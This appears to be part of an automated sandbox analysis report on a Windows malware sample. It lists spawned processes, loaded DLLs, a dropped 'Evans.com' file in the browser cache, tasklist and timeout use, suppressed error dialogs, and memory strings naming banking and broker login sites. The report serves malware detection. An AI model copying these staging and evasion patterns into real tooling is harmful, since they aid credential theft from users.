    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Users\user\Desktop\6684V5n83w.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 6684V5n83w.exeStatic file information: File size 1160471 > 1048576
    Source: 6684V5n83w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: 6684V5n83w.exeStatic PE information: real checksum: 0x127cc4 should be: 0x127d64

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 2468Thread sleep count: 90 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: 6xlx4w.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: 6xlx4w.13.drBinary or memory string: discord.comVMware20,11696428655f
    Source: 6xlx4w.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: global block list test formVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: msedge.exe, 00000015.00000003.2903482976.000002E400384000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: 6xlx4w.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: 6xlx4w.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: 6xlx4w.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: 6xlx4w.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: 6684V5n83w.exe, 00000000.00000002.2178884292.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e69g
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: 6xlx4w.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: 6xlx4w.13.drBinary or memory string: outlook.office365.comVMware20,11696428655t
